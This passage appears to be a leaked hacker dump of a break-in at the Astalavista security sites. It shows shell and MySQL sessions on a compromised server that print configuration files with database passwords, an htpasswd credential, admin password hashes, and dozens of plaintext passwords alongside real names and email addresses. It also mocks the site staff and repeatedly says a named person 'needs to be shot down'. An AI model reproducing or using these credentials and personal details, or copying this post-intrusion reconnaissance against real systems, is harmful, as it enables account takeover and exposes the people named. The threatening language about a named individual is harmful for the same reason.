+            $comExploits[$x]['author']    = 'milw0rm';
+            $comExploits[$x]['text']      = $text;
+            $comExploits[$x]['source']    = $ext;
+            $comExploits[$x]['url1']      = '';
+            $comExploits[$x]['url2']      = '';
+            $comExploits[$x]['catid']     = $cat;
+            $comExploits[$x]['lang']      = '2';
+            $comExploits[$x]['userid']    = '12';
+            $comExploits[$x]['startdate'] = '0000-00-00';
+            $comExploits[$x]['enddate']   = '0000-00-00';
+            $comExploits[$x]['status']    = '1';
+            $comExploits[$x]['changelog'] = $date;
+
+        }
+[snip]
+    $xml = '
+
+    
+        ASTALAVISTA.com - Exploits
+        http://www.astalavista.com/exploits
+        All availably Exploits.
+        en-us
+        ' . date('F, j M Y H:i:s O') . '
+        http://blogs.law.harvard.edu/tech/rss
+        Astalavista.com
+        info@astalavista.com' . $items . '
+    
+';
+
+
+    if (file_exists(FULLPATH . '/feed/exploits.xml')) {
+        unlink (FULLPATH . '/feed/exploits.xml');
+    }
+
+
+    file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
+[snip]
+
+sh-3.2$ cat exploits.sh
+#!/bin/sh
+
+###########################################################
+#                                                         #
+#   Title:        milw0rm exploits adder                  #
+#   Description:  Add all milw0rm exploits to the         #
+#                 Astalavista.com database                #
+#                                                         #
+#   Company:      Astalavista Group                       #
+#   Author:       Paulo M. Santos                         #
+#   E-Mail:       paulo.santos@astalavista.ch             #
+#                                                         #
+###########################################################
+
+
+# path
+this_path=/home/com/public_html/modifications/cronjobs
+
+# change directory
+cd $this_path
+cd tmp/
+
+# delete files
+rm -rf milw0rm.tar.* &
+rm -rf milw0rm/ &
+
+# wget milw0rm paket
+wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
+
+# extract milw0rm paket
+tar -xvf milw0rm.tar.bz2
+
+# change owner
+chown -R com .
+chgrp -R com .
+
+# execute php script
+cd $this_path
+php -q exploits.php
+
+# delete files
+rm -rf tmp/milw0rm.tar.*
+rm -rf tmp/milw0rm/
+
+sh-3.2$ echo "Paulo M. Santos needs to be shot down."
+Paulo M. Santos needs to be shot down.
+
+mysql -u contrexxuser2 -p
+Enter password:
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 261694
+Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+
+Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
+
+mysql> show databases;
++--------------------+
+| Database           |
++--------------------+
+| information_schema |
+| com_contrexx2      |
+| com_contrexx2_live |
+| test               |
++--------------------+
+4 rows in set (0.00 sec)
+
+mysql> use com_contrexx2_live
+Database changed
+mysql> show tables;
++--------------------------------------------------+
+| Tables_in_com_contrexx2_live                     |
++--------------------------------------------------+
+| cc_banner_counter                                |
+| cc_search_counter                                |
+| contrexx_access_group_dynamic_ids                |
+| contrexx_access_group_static_ids                 |
+| contrexx_access_rel_user_group                   |
+| contrexx_access_settings                         |
+| contrexx_access_user_attribute                   |
+| contrexx_access_user_attribute_name              |
+| contrexx_access_user_attribute_value             |
+| contrexx_access_user_core_attribute              |
+| contrexx_access_user_groups                      |
+| contrexx_access_user_mail                        |
+| contrexx_access_user_profile                     |
+| contrexx_access_user_title                       |
+| contrexx_access_user_validity                    |
+| contrexx_access_users                            |
+| contrexx_backend_areas                           |
+| contrexx_backups                                 |
+| contrexx_content                                 |
+| contrexx_content_history                         |
+| contrexx_content_logfile                         |
+| contrexx_content_navigation                      |
+| contrexx_content_navigation_history              |
+| contrexx_ids                                     |
+| contrexx_languages                               |
+| contrexx_lib_country                             |
+| contrexx_log                                     |
+| contrexx_module_alias_source                     |
+| contrexx_module_alias_target                     |
+| contrexx_module_block_blocks                     |
+| contrexx_module_block_rel_lang                   |
+| contrexx_module_block_rel_pages                  |
+| contrexx_module_block_settings                   |
+| contrexx_module_blog_categories                  |
+| contrexx_module_blog_comments                    |
+| contrexx_module_blog_message_to_category         |
+| contrexx_module_blog_messages                    |
+| contrexx_module_blog_messages_lang               |
+| contrexx_module_blog_networks                    |
+| contrexx_module_blog_networks_lang               |
+| contrexx_module_blog_settings                    |
+| contrexx_module_blog_votes                       |
+| contrexx_module_calendar                         |
+| contrexx_module_calendar_access                  |
+| contrexx_module_calendar_categories              |
+| contrexx_module_calendar_form_data               |
+| contrexx_module_calendar_form_fields             |
+| contrexx_module_calendar_registrations           |
+| contrexx_module_calendar_settings                |
+| contrexx_module_calendar_style                   |
+| contrexx_module_contact_form                     |
+| contrexx_module_contact_form_data                |
+| contrexx_module_contact_form_field               |
+| contrexx_module_contact_settings                 |
+| contrexx_module_data_categories                  |
+| contrexx_module_data_message_to_category         |
+| contrexx_module_data_messages                    |
+| contrexx_module_data_messages_lang               |
+| contrexx_module_data_placeholders                |
+| contrexx_module_data_settings                    |
+| contrexx_module_directory_access                 |
+| contrexx_module_directory_categories             |
+| contrexx_module_directory_dir                    |
+| contrexx_module_directory_inputfields            |
+| contrexx_module_directory_levels                 |
+| contrexx_module_directory_mail                   |
+| contrexx_module_directory_rel_dir_cat            |
+| contrexx_module_directory_rel_dir_level          |
+| contrexx_module_directory_settings               |
+| contrexx_module_directory_settings_google        |
+| contrexx_module_directory_vote                   |
+| contrexx_module_docsys                           |
+| contrexx_module_docsys_categories                |
+| contrexx_module_egov_configuration               |
+| contrexx_module_egov_orders                      |
+| contrexx_module_egov_product_calendar            |
+| contrexx_module_egov_product_fields              |
+| contrexx_module_egov_products                    |
+| contrexx_module_egov_settings                    |
+| contrexx_module_exploits                         |
+| contrexx_module_exploits_categories              |
+| contrexx_module_feed_category                    |
+| contrexx_module_feed_news                        |
+| contrexx_module_feed_newsml_association          |
+| contrexx_module_feed_newsml_categories           |
+| contrexx_module_feed_newsml_documents            |
+| contrexx_module_feed_newsml_providers            |
+| contrexx_module_forum_access                     |
+| contrexx_module_forum_categories                 |
+| contrexx_module_forum_categories_lang            |
+| contrexx_module_forum_notification               |
+| contrexx_module_forum_postings                   |
+| contrexx_module_forum_rating                     |
+| contrexx_module_forum_settings                   |
+| contrexx_module_forum_statistics                 |
+| contrexx_module_gallery_categories               |
+| contrexx_module_gallery_comments                 |
+| contrexx_module_gallery_language                 |
+| contrexx_module_gallery_language_pics            |
+| contrexx_module_gallery_pictures                 |
+| contrexx_module_gallery_settings                 |
+| contrexx_module_gallery_votes                    |
+| contrexx_module_guestbook                        |
+| contrexx_module_guestbook_settings               |
+| contrexx_module_livecam                          |
+| contrexx_module_livecam_settings                 |
+| contrexx_module_market                           |
+| contrexx_module_market_access                    |
+| contrexx_module_market_categories                |
+| contrexx_module_market_mail                      |
+| contrexx_module_market_paypal                    |
+| contrexx_module_market_settings                  |
+| contrexx_module_market_spez_fields               |
+| contrexx_module_mediadir_access                  |
+| contrexx_module_mediadir_categories              |
+| contrexx_module_mediadir_comments                |
+| contrexx_module_mediadir_dir                     |
+| contrexx_module_mediadir_inputfields             |
+| contrexx_module_mediadir_levels                  |
+| contrexx_module_mediadir_mail                    |
+| contrexx_module_mediadir_rel_dir_cat             |
+| contrexx_module_mediadir_rel_dir_level           |
+| contrexx_module_mediadir_reports                 |
+| contrexx_module_mediadir_settings                |
+| contrexx_module_mediadir_settings_google         |
+| contrexx_module_mediadir_vote                    |
+| contrexx_module_memberdir_directories            |
+| contrexx_module_memberdir_name                   |
+| contrexx_module_memberdir_settings               |
+| contrexx_module_memberdir_values                 |
+| contrexx_module_nettools_allowed_groups          |
+| contrexx_module_nettools_settings                |
+| contrexx_module_news                             |
+| contrexx_module_news_access                      |
+| contrexx_module_news_categories                  |
+| contrexx_module_news_settings                    |
+| contrexx_module_news_teaser_frame                |
+| contrexx_module_news_teaser_frame_templates      |
+| contrexx_module_news_ticker                      |
+| contrexx_module_newsletter                       |
+| contrexx_module_newsletter_attachment            |
+| contrexx_module_newsletter_category              |
+| contrexx_module_newsletter_confirm_mail          |
+| contrexx_module_newsletter_rel_cat_news          |
+| contrexx_module_newsletter_rel_user_cat          |
+| contrexx_module_newsletter_settings              |
+| contrexx_module_newsletter_template              |
+| contrexx_module_newsletter_tmp_sending           |
+| contrexx_module_newsletter_user                  |
+| contrexx_module_newsletter_user_title            |
+| contrexx_module_onlinetools_defaultports         |
+| contrexx_module_onlinetools_defaultports_back    |
+| contrexx_module_onlinetools_geolitecity_blocks   |
+| contrexx_module_onlinetools_geolitecity_country  |
+| contrexx_module_onlinetools_geolitecity_location |
+| contrexx_module_podcast_category                 |
+| contrexx_module_podcast_medium                   |
+| contrexx_module_podcast_rel_category_lang        |
+| contrexx_module_podcast_rel_medium_category      |
+| contrexx_module_podcast_settings                 |
+| contrexx_module_podcast_template                 |
+| contrexx_module_proxydb                          |
+| contrexx_module_recommend                        |
+| contrexx_module_repository                       |
+| contrexx_module_securitynews_cats                |
+| contrexx_module_securitynews_feeds               |
+| contrexx_module_securitynews_news                |
+| contrexx_module_shop_categories                  |
+| contrexx_module_shop_config                      |
+| contrexx_module_shop_countries                   |
+| contrexx_module_shop_currencies                  |
+| contrexx_module_shop_customers                   |
+| contrexx_module_shop_importimg                   |
+| contrexx_module_shop_lsv                         |
+| contrexx_module_shop_mail                        |
+| contrexx_module_shop_mail_content                |
+| contrexx_module_shop_manufacturer                |
+| contrexx_module_shop_order_items                 |
+| contrexx_module_shop_order_items_attributes      |
+| contrexx_module_shop_orders                      |
+| contrexx_module_shop_payment                     |
+| contrexx_module_shop_payment_processors          |
+| contrexx_module_shop_pricelists                  |
+| contrexx_module_shop_products                    |
+| contrexx_module_shop_products_attributes         |
+| contrexx_module_shop_products_attributes_name    |
+| contrexx_module_shop_products_attributes_value   |
+| contrexx_module_shop_products_downloads          |
+| contrexx_module_shop_rel_countries               |
+| contrexx_module_shop_rel_payment                 |
+| contrexx_module_shop_rel_shipment                |
+| contrexx_module_shop_shipment_cost               |
+| contrexx_module_shop_shipper                     |
+| contrexx_module_shop_vat                         |
+| contrexx_module_shop_zones                       |
+| contrexx_module_u2u_address_list                 |
+| contrexx_module_u2u_message_log                  |
+| contrexx_module_u2u_sent_messages                |
+| contrexx_module_u2u_settings                     |
+| contrexx_module_u2u_user_log                     |
+| contrexx_modules                                 |
+| contrexx_sessions                                |
+| contrexx_settings                                |
+| contrexx_settings_smtp                           |
+| contrexx_skins                                   |
+| contrexx_stats_browser                           |
+| contrexx_stats_colourdepth                       |
+| contrexx_stats_config                            |
+| contrexx_stats_country                           |
+| contrexx_stats_hostname                          |
+| contrexx_stats_javascript                        |
+| contrexx_stats_operatingsystem                   |
+| contrexx_stats_referer                           |
+| contrexx_stats_requests                          |
+| contrexx_stats_requests_summary                  |
+| contrexx_stats_screenresolution                  |
+| contrexx_stats_search                            |
+| contrexx_stats_spiders                           |
+| contrexx_stats_spiders_summary                   |
+| contrexx_stats_visitors                          |
+| contrexx_stats_visitors_summary                  |
+| contrexx_voting_additionaldata                   |
+| contrexx_voting_email                            |
+| contrexx_voting_rel_email_system                 |
+| contrexx_voting_results                          |
+| contrexx_voting_system                           |
+| foo                                              |
++--------------------------------------------------+
+227 rows in set (0.01 sec)
+
+mysql> select count(*) as skids from contrexx_access_users;
++-------+
+| skids |
++-------+
+| 53699 |
++-------+
+1 row in set (0.00 sec)
+
+mysql> describe contrexx_access_users;
++------------------+------------------------------------------+------+-----+--------------+----------------+
+| Field            | Type                                     | Null | Key | Default      | Extra          |
++------------------+------------------------------------------+------+-----+--------------+----------------+
+| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |
+| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |
+| username         | varchar(40)                              | YES  | MUL | NULL         |                |
+| password         | varchar(32)                              | YES  |     | NULL         |                |
+| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
+| expiration       | int(14) unsigned                         | NO   |     | 0            |                |
+| validity         | int(10) unsigned                         | NO   |     | 0            |                |
+| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
+| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
+| email            | varchar(255)                             | YES  |     | NULL         |                |
+| email_access     | enum('everyone','members_only','nobody') | NO   |     | nobody       |                |
+| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
+| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
+| active           | tinyint(1)                               | NO   |     | 0            |                |
+| profile_access   | enum('everyone','members_only','nobody') | NO   |     | members_only |                |
+| restore_key      | varchar(32)                              | NO   |     |              |                |
+| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |
+| u2u_active       | enum('0','1')                            | NO   |     | 1            |                |
++------------------+------------------------------------------+------+-----+--------------+----------------+
+18 rows in set (0.00 sec)
+
+mysql> select username,password,email from contrexx_access_users where is_admin = 1;
++------------+----------------------------------+-----------------------------+
+| username   | password                         | email                       |
++------------+----------------------------------+-----------------------------+
+| system     | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com          |
+| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com      |
+| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
+| schmid     | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com   |
++------------+----------------------------------+-----------------------------+
+4 rows in set (0.04 sec)
+
+mysql> exit;
+Bye
+
+[~] There you go, your "team of security and IT professionals" is a joke.
+
++------------------------------+
+system:f82BN3+_*
+Be1er0ph0r:belerophor4astacom
+prozac:asta4cms!
+commander:mpbdaagf6m
+sykadul:ak29eral
++------------------------------+
+
+[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
+	...and the others, find another area to get paid from, security isn't for sale and you obviously fail at it.
+
+[~] Lets move to astalavista.net now,
+
+From :
+>> Everyone knows that the best defense is a good offense. 
+>> Those who wait for their foes to find a security loophole are opting for the wrong strategy. 
+>> The ASTALAVISTA hacking & security community is the largest IT security community in the world. 
+>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking."
+
+>> Go ahead, try and hack our server . in a completely legal way!
+>> Learn by doing: We offer our members tricky tasks and challenges on an
+>> ongoing basis so you can test your knowledge and abilities. You can also
+>> demonstrate what you.ve mastered by taking part in regular hacker contests
+>> and war games
+
+[~] Lets take a look there, after all... they are hack-proof, aren't they?!
+
+[-] Tricky task: Find home dir of astalavista.net
+
+sh-3.2$ ls -la ~astanet
+total 48
+drwx--x--x  6 astanet astanet 4096 Dec 23 15:55 .
+drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
+drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
+-rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history
+-rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout
+-rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile
+-rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc
+drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains
+drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap
+drwx------  2 astanet astanet 4096 Dec 23 12:18 mail
+lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
+-rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow
+
+sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
+sh-3.2$ ls -la
+total 200
+drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 .
+drwx--x--x  8 astanet astanet  4096 Dec 23 13:53 ..
+drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007
+drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql
+drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 astanet@astalavista.com
+drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
+drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
+-rw-r--r--  1 astanet astanet 25724 Apr  4  2006 banner.jpg
+drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
+drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
+drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd
+-rw-r--r--  1 astanet astanet    36 Jan  5  2006 error.php
+-rw-r--r--  1 astanet astanet  1406 Jan  5  2006 favicon.ico
+drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
+drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour
+-rw-r--r--  1 astanet astanet    18 Jan  5  2006 htaccess
+-rw-r--r--  1 astanet astanet   585 Mar 24 14:50 .htaccess
+-rw-r--r--  1 astanet astanet   398 Jan  5  2006 index1.php
+-rw-r--r--  1 astanet astanet  1036 Jan  5  2006 _index.html
+-rw-r--r--  1 astanet astanet  6880 Dec 23 14:44 index.php
+-rw-r--r--  1 astanet astanet   676 Mar 21  2006 index_redirect.php
+-rw-r--r--  1 astanet astanet   739 Feb 24  2006 index.swf
+drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
+drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
+drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib
+drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
+drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
+drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
+drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new
+-rw-r--r--  1 astanet astanet  7219 Feb 24  2006 pix1.swf
+drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
+-rw-r--r--  1 astanet astanet    23 Jan  5  2006 robots.txt
+drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
+drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
+drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com
+drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
+drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
+drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
+drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
+drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old
+-rw-r--r--  1 astanet astanet    35 Dec  4  2006 webcash.php
+drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
+
+sh-3.2$ head -20 index.php
+
+* @version       1.0
+*/
+
+        if ($_SERVER['PHP_SELF'] == '/webcash.php') {
+                $dontStartSession = false;
+        } else {
+                $dontStartSession = true;
+        }
+        require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
+        require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
+        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
+        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');
+
+sh-3.2$ cd config
+sh-3.2$ ls -la
+total 32
+drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
+drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
+-rw-r--r--  1 astanet astanet  987 Aug 11  2006 adm.conf.php
+-rw-r--r--  1 astanet astanet 4937 Dec 23 15:48 com.conf.php
+-rw-r--r--  1 astanet astanet  913 Aug 11  2006 cron.conf.php
+-rw-r--r--  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
+-rw-r--r--  1 astanet astanet 2724 May 30  2007 int.conf.php
+
+sh-3.2$ cat com.conf.php
+[snip]
+//member-database
+$_CONFIG['db_mem_server']       = 'localhost';
+$_CONFIG['db_mem_database'] = 'astanet_membersystem';
+$_CONFIG['db_mem_user']         = 'astanet_db';
+$_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
+$_CONFIG['db_mem_debug']        = false; //true or false
+//ads-database
+$_CONFIG['db_ads_server']       = 'localhost';
+$_CONFIG['db_ads_database'] = 'astanet_ads';
+$_CONFIG['db_ads_user']         = 'astanet_db';
+$_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
+$_CONFIG['db_ads_debug']        = false; //true or false
+//rainbow-database
+$_CONFIG['db_rainbow_server']   = '212.254.194.163';
+$_CONFIG['db_rainbow_database'] = 'rainbow';
+$_CONFIG['db_rainbow_user']     = 'dinu';
+$_CONFIG['db_rainbow_password'] = 'dinudinu';
+$_CONFIG['db_rainbow_debug']    = false; //true or false
+//mailing lists database
+$_CONFIG['db_mailing_lists_server']     = 'localhost';
+$_CONFIG['db_mailing_lists_database']   = 'astanet_mailing_lists';
+$_CONFIG['db_mailing_lists_user']               = 'astanet_db';
+$_CONFIG['db_mailing_lists_password']   = 'TXwVrC7hbq';
+$_CONFIG['db_mailing_lists_debug']              = false; //true or false
+//paypal
+$_CONFIG['sub_pp_url']          = 'https://www.paypal.com/cgi-bin/webscr';
+$_CONFIG['sub_pp_cmd']          = '_xclick';
+$_CONFIG['sub_pp_business'] = 'info@astalavista.net';
+$_CONFIG['sub_pp_noship']       = '1';
+$_CONFIG['sub_pp_referer']      = 'https://www.paypal.com/';
+[snip]
+
+sh-3.2$ cd ..
+sh-3.2$ cd member
+sh-3.2$ ls -la
+total 20
+drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
+drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
+-rw-r--r--  1 astanet astanet   19 Jan 13 14:02 .htaccess
+-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
+sh-3.2$ cat .htaccess
+SecFilterEngine off
+
+sh-3.2$ cd ..
+sh-3.2$ cd cron
+sh-3.2$ ls -la
+total 168
+drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
+drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 ..
+-rw-r--r--  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php
+-rw-r--r--  1 astanet astanet  2356 Aug 11  2006 0_functions.php
+-rw-r--r--  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
+-rw-r--r--  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
+-rw-r--r--  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
+-rw-r--r--  1 astanet astanet   432 Aug 11  2006 1_weekly.php
+-rw-r--r--  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
+-rw-r--r--  1 astanet astanet  4882 Dec 23 15:40 2_archives.php
+-rw-r--r--  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
+-rw-r--r--  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
+-rw-r--r--  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
+-rw-r--r--  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php
+-rw-r--r--  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
+-rw-r--r--  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
+-rw-r--r--  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
+-rw-r--r--  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
+-rw-r--r--  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php
+-rw-r--r--  1 astanet astanet   796 Aug 11  2006 99_create_emails.php
+drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
+-rw-r--r--  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
+-rw-r--r--  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
+
+sh-3.2$ cd ..
+sh-3.2$ cd _007
+sh-3.2$ ls -la
+total 24
+drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
+drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
+-rw-r--r--  1 astanet astanet   96 Dec 23 15:17 .htaccess
+-rw-r--r--  1 astanet astanet 3263 Jan 15  2007 index.php
+-rw-r--r--  1 astanet astanet   20 Dec 27  2006 info.php
+drwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
+
+sh-3.2$ cat  .htaccess
+authType Basic
+authName Admin
+authUserFile /home/astanet/auth/.htadm_pwd
+require valid-user
+
+sh-3.2$ cat /home/astanet/auth/.htadm_pwd
+admin2net:CR0bl65MwhfT
+
+sh-3.2$ mysql -u astanet_db -p
+Enter password:
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 275153
+Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+
+Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
+
+mysql> show databases;
++-----------------------+
+| Database              |
++-----------------------+
+| information_schema    |
+| astanet_ads           |
+| astanet_mailing_lists |
+| astanet_mediawiki     |
+| astanet_membersystem  |
+| test                  |
++-----------------------+
+6 rows in set (0.00 sec)
+
+mysql> use astanet_membersystem
+Database changed
+mysql> show tables;
++-----------------------------------+
+| Tables_in_astanet_membersystem    |
++-----------------------------------+
+| blacklist_categories              |
+| blacklist_content                 |
+| blacklist_levels                  |
+| blacklist_mcset                   |
+| dir_categories                    |
+| dir_comments                      |
+| dir_links                         |
+| dir_temp                          |
+| dir_votes                         |
+| documents                         |
+| documents_categories              |
+| email_content                     |
+| email_settings                    |
+| exploits                          |
+| exploits_categories               |
+| exploittree_categories            |
+| exploittree_exploits              |
+| home_values                       |
+| iso_countries                     |
+| links_categories                  |
+| links_records                     |
+| links_unauth                      |
+| links_votes                       |
+| log                               |
+| news_categories                   |
+| news_comments                     |
+| news_emoticons                    |
+| news_latest                       |
+| news_messages                     |
+| news_statistics                   |
+| news_votes                        |
+| prices_content                    |
+| prices_offers                     |
+| rss_settings                      |
+| sessions                          |
+| stats_signups                     |
+| u2u2                              |
+| u2u_contact                       |
+| u2u_settings                      |
+| user_keywords_selected_categories |
+| users                             |
+| users_ipn_test                    |
+| users_keyword_values              |
+| users_profile                     |
+| users_temp                        |
+| users_upgrade                     |
++-----------------------------------+
+46 rows in set (0.00 sec)
+
+mysql> describe users;
++--------------------------+--------------------------------------+------+-----+---------------------+----------------+
+| Field                    | Type                                 | Null | Key | Default             | Extra          |
++--------------------------+--------------------------------------+------+-----+---------------------+----------------+
+| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
+| user                     | varchar(50)                          | NO   |     |                     |                |
+| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
+| password                 | varchar(30)                          | NO   |     |                     |                |
+| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |
+| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |
+| email                    | varchar(50)                          | NO   |     |                     |                |
+| ip                       | varchar(15)                          | NO   |     | 0                   |                |
+| proxy                    | set('0','1')                         | NO   |     | 0                   |                |
+| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
+| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |
+| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
+| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
+| checked                  | set('0','1','2')                     | NO   |     | 0                   |                |
+| freemember               | set('0','1')                         | NO   |     | 0                   |                |
+| ordertype                | set('transfer','wp','pp','mc','CnB') | YES  |     | NULL                |                |
+| lang                     | tinytext                             | NO   |     |                     |                |
+| adid                     | smallint(6)                          | NO   |     | 0                   |                |
+| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
+| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
+| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |
+| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
++--------------------------+--------------------------------------+------+-----+---------------------+----------------+
+22 rows in set (0.01 sec)
+
+mysql> select count(*) as skids from users;
++-------+
+| skids |
++-------+
+| 25199 |
++-------+
+1 row in set (0.00 sec)
+
+mysql> select user,nickname,password,email from users where userlevel = 1;
++--------------------------+----------------------+------------------+-----------------------------------+
+| user                     | nickname             | password         | email                             |
++--------------------------+----------------------+------------------+-----------------------------------+
+| pascal                   | prozac               | astaman3         | info@astalavista.net              |
+| Ivan Schmid              | rOOtless1            | astalavista4asta | ivan.schmid@comvation.com         |
+| qreymer                  | Palermo              | qblsw85iam       | eche@home.se                      |
+| Christian Wehrli         | g0atherd             | hitt?74          | g0atherd@gmx.net                  |
+| Andrew Blake             | Minky                | liq73uid         | a.blake@har.mrc.ac.uk             |
+| Martin Wyss              | dinu                 | kj63;cXy         | martin.wyss@astalavista.net       |
+| Leandro Nery             | Timan_no_Sanco       | nery2002         | leandronery@hotmail.com           |
+| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | shavingryansprivates1@hotmail.com |
+| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | spoofedexistence@hotmail.com      |
+| David M Lee              | Daremo               | icG12m03         | daremo@hackerheaven.com           |
+| David Corn               | akriel               | ve3uB$cUku       | akriel@fallenroot.net             |
+| Thomas Kalin             | Gwanun               | QwErTy123        | thomas.kaelin@astalavista.net     |
+| Marcus unknown           | Cra58cker            | hhCr4ck06        | unknownmarcus@hotmail.com         |
+| David Ellis              | dellis203            | philip           | dellis@nightwatchnss.com          |
+| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | xeor@hush.com                     |
+| Paulo Santos             | Be1er0ph0r1          | amor01           | pmsantos@gmx.ch                   |
+| Thomas D?ppen            | daha                 | asta4tom         | thomas.daeppen@astalavista.ch     |
+| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | toraj.a.m@gmail.com               |
+| Fabius Bernet            | traviser             | wellenreiter100  | fabius.bernet@astalavista.ch      |
+| Zachary McElroy          | duder1               | dirty245dix      | mcelroyzj@yahoo.com               |
+| Leron Cohen              | cohen2               | leron4free       | leron@quiredmedia.com             |
+| Beatriz Pontes           | anonymous1656        | pitas            | joao.pedro.pontes@gmail.com       |
